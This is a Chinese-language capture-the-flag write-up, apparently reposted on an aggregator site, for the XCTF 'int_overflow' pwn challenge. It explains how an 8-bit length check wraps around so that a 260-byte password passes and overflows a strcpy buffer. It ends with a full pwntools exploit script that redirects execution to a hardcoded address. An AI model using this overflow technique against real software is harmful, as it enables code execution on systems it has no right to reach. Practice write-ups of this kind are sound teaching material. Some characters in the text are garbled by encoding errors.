[攻防世界 pwn]——int_overflow

• 題目地址: https://adworld.xctf.org.cn/
• 題目:
  
  checksec一下,開啟了NX
  
  在IDA中看看, 發(fā)現(xiàn)了后面函數(shù)和可以gets函數(shù), 不過可惜這個gets函數(shù)無法棧溢出。不過我們看到在check_passwd函數(shù)中有strcpy函數(shù), dest是可以棧溢出的, 不過前題是我們可以繞過檢查。
  
  
  
  
  看了下 , 判斷的v3是儲存在al這個8位寄存器中, 也就是一個字節(jié)。當然也可以從_int8看出來是一個字節(jié) 0~255。所以256就是0, 260就是4
  

from pwn import * p = remote("111.200.241.244",47527) p = process("./pwn") sys_addr = 0x0804868B p.sendlineafter("Your choice:", '1') p.sendlineafter("Please input your username:\n",'peak') payload = 'a' * 24 + p32(sys_addr) payload = payload.ljust(260, 'a') p.sendlineafter("Please input your passwd:\n",payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[攻防世界 pwn]——int_overflow的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。